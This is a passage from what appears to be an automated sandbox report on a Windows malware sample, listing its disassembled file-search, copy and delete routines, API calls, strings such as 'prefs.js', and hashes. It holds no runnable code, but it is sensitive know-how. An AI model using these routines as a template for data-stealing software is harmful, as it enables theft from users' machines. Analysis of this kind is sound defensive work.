                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 13328894-2848263008
                                    • Opcode ID: b19de660a787c585203e961524785ef4f8c7c5ebf2fdcdf8f42e36bc1f4495a2
                                    • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                    • Opcode Fuzzy Hash: b19de660a787c585203e961524785ef4f8c7c5ebf2fdcdf8f42e36bc1f4495a2
                                    • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                    Function 007F4B77 Relevance: 27.2, APIs: 18, Instructions: 172fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 007F4B93
                                    • FindFirstFileA.KERNEL32(?,?), ref: 007F4BAA
                                    • StrCmpCA.SHLWAPI(?,00420FDC), ref: 007F4BD8
                                    • StrCmpCA.SHLWAPI(?,00420FE0), ref: 007F4BEE
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 007F4DE4
                                    • FindClose.KERNEL32(000000FF), ref: 007F4DF9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID:
                                    • API String ID: 180737720-0
                                    • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                    • Instruction ID: a16fabcee7ab805739f3b6ffe4227971254c0fdf72b0e88b112109d63b6ce74f
                                    • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                    • Instruction Fuzzy Hash: 916165B5940218BBCB24EBE0DD49FFA73BDFB59700F404588B60992141EB75AB85CF91
                                    Function 007EC0D7 Relevance: 26.2, APIs: 17, Instructions: 675fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                    • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 007EC15C
                                    • StrCmpCA.SHLWAPI(?,004213F8), ref: 007EC1B4
                                    • StrCmpCA.SHLWAPI(?,004213FC), ref: 007EC1CA
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 007ECA26
                                    • FindClose.KERNEL32(000000FF), ref: 007ECA38
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                    • Instruction ID: 1c96dbb6cb7048d00ea0c420810c48827c6ce026d9c770b1f88eb724619d55b7
                                    • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                    • Instruction Fuzzy Hash: 8C4234B6A10148EBCB14FBB0DD5ADFD7379AF58300F408568B60E56291EE389B49CF52
                                    Function 00413EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00413EC3
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                    • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                    • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                    • FindClose.KERNEL32(000000FF), ref: 00414081
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 180737720-4073750446
                                    • Opcode ID: 99b6f57015465be570b51e732a918a206cfe933a16528d1161771a5eb7529697
                                    • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                    • Opcode Fuzzy Hash: 99b6f57015465be570b51e732a918a206cfe933a16528d1161771a5eb7529697
                                    • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                    Function 007F47D7 Relevance: 22.6, APIs: 15, Instructions: 137stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007F47E7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007F47EE
                                    • wsprintfA.USER32 ref: 007F480D
                                    • FindFirstFileA.KERNEL32(?,?), ref: 007F4824
                                    • StrCmpCA.SHLWAPI(?,00420FC4), ref: 007F4852
                                    • StrCmpCA.SHLWAPI(?,00420FC8), ref: 007F4868
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 007F48F2
                                    • FindClose.KERNEL32(000000FF), ref: 007F4907
                                    • lstrcat.KERNEL32(?,0064A524), ref: 007F492C
                                    • lstrcat.KERNEL32(?,0064A22C), ref: 007F493F
                                    • lstrlen.KERNEL32(?), ref: 007F494C
                                    • lstrlen.KERNEL32(?), ref: 007F495D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                    • String ID:
                                    • API String ID: 671575355-0
                                    • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                    • Instruction ID: f00b95b2ba0a9bb600521399604c040d36e9757a76d5e42e915ed9f2aed3cc1e
                                    • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                    • Instruction Fuzzy Hash: 975156B955021CABCB24EBB0DD89FFE737DAB58700F404588F64992190DB789B85CF92
                                    Function 007F4107 Relevance: 18.1, APIs: 12, Instructions: 133fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 007F412A
                                    • FindFirstFileA.KERNEL32(?,?), ref: 007F4141
                                    • StrCmpCA.SHLWAPI(?,00420FAC), ref: 007F416F
                                    • StrCmpCA.SHLWAPI(?,00420FB0), ref: 007F4185
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 007F42D3
                                    • FindClose.KERNEL32(000000FF), ref: 007F42E8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID:
                                    • API String ID: 180737720-0
                                    • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                    • Instruction ID: 355a650502e5a0d9046718c6ae11a1cc32f00518074f6c7d3c0b6768ce0be33f
                                    • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                    • Instruction Fuzzy Hash: 305161B690021CFBCB24EBF0DC89EFA737DBB58300F404598B65992140DB79AB858F95
                                    Function 0040ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 0040ED3E
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                    • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                    • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                    • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 180737720-1013718255
                                    • Opcode ID: 7c62be60ea4ce17a6daee6ca2e1ad8d80329f85963da6490b9882dd3eef46d84
                                    • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                    • Opcode Fuzzy Hash: 7c62be60ea4ce17a6daee6ca2e1ad8d80329f85963da6490b9882dd3eef46d84
                                    • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                    Function 0040DE10 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                    • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                    • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                    • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID: 4@$\*.*
                                    • API String ID: 2325840235-1993203227
                                    • Opcode ID: 2fdb38499aad82abd71ff5b0795ef68458680d2d1f732a1e4f71a59c5be8a5c9
                                    • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                    • Opcode Fuzzy Hash: 2fdb38499aad82abd71ff5b0795ef68458680d2d1f732a1e4f71a59c5be8a5c9
                                    • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                    Function 0040F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                    • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                    • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                    • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 3334442632-3783873740
                                    • Opcode ID: c63fd1c20efeb8716f133c94eea4b1cf0d084daeba1700bb8994144291ed7823
                                    • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                    • Opcode Fuzzy Hash: c63fd1c20efeb8716f133c94eea4b1cf0d084daeba1700bb8994144291ed7823
                                    • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                    Function 004016D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
                                    • StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
                                    • StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                    • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                    • FindClose.KERNEL32(000000FF), ref: 00401E32
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 1415058207-1173974218
                                    • Opcode ID: b05b312c236247dd8bb4291ae9665c13a99689da75fb9ac0a03e7b6d5e9b60d0
                                    • Instruction ID: 47de987318eafb428d6e9afc63df3879dd5ba7490b623eb573f4dfe72a2f4575
                                    • Opcode Fuzzy Hash: b05b312c236247dd8bb4291ae9665c13a99689da75fb9ac0a03e7b6d5e9b60d0
                                    • Instruction Fuzzy Hash: 641260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                    Function 007EEF87 Relevance: 13.9, APIs: 9, Instructions: 369fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 007EEFA5
                                    • FindFirstFileA.KERNEL32(?,?), ref: 007EEFBC
                                    • StrCmpCA.SHLWAPI(?,00421538), ref: 007EF012
                                    • StrCmpCA.SHLWAPI(?,0042153C), ref: 007EF028
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 007EF515
                                    • FindClose.KERNEL32(000000FF), ref: 007EF52A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID:
                                    • API String ID: 180737720-0
                                    • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                    • Instruction ID: e94e750149732e8ee8c2ae1541258ab1416e73da4b94963e81ca7f903850462c
                                    • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                    • Instruction Fuzzy Hash: 96E1D2B191121CEADB58EB60DD56EFE7339AF54300F4081E9B60E62252EE385F89CF51
                                    Function 007EDCE7 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 007EDD52
                                    • StrCmpCA.SHLWAPI(?,004214B4), ref: 007EDD9A
                                    • StrCmpCA.SHLWAPI(?,004214B8), ref: 007EDDB0
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 007EE033
                                    • FindClose.KERNEL32(000000FF), ref: 007EE045
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                    • Instruction ID: 02ec1579407768ad1fe9ef5981b156bcceeaff8476327112e711728694d137f5
                                    • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                    • Instruction Fuzzy Hash: 5F9136B2900248EBCB14FBB0DD5ADFD7379AF99300F40856DB54A56241EE389B5CCB92
                                    Function 0040DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                    • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                    • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                    • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: 3e4cb658669e0da854d1c83ae07f47800a235198039fbdbe3b22788fe6e17176
                                    • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                    • Opcode Fuzzy Hash: 3e4cb658669e0da854d1c83ae07f47800a235198039fbdbe3b22788fe6e17176
                                    • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                    Function 007EF917 Relevance: 12.3, APIs: 8, Instructions: 275fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 007EF985
                                    • StrCmpCA.SHLWAPI(?,004215BC), ref: 007EF9D6
                                    • StrCmpCA.SHLWAPI(?,004215C0), ref: 007EF9EC
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 007EFD18
                                    • FindClose.KERNEL32(000000FF), ref: 007EFD2A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                    • Instruction ID: cb5a803f6e8b2001fd027fbad0fcfa7788fc03a188260ed832d06a0dfee70cfd
                                    • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                    • Instruction Fuzzy Hash: BDB131B1A00258EBCB24EF60DD5AEFE7379AF54300F4081A9E54E56251EF385B49CF92
                                    Function 0040E430 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 514fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                                    • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                                    • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
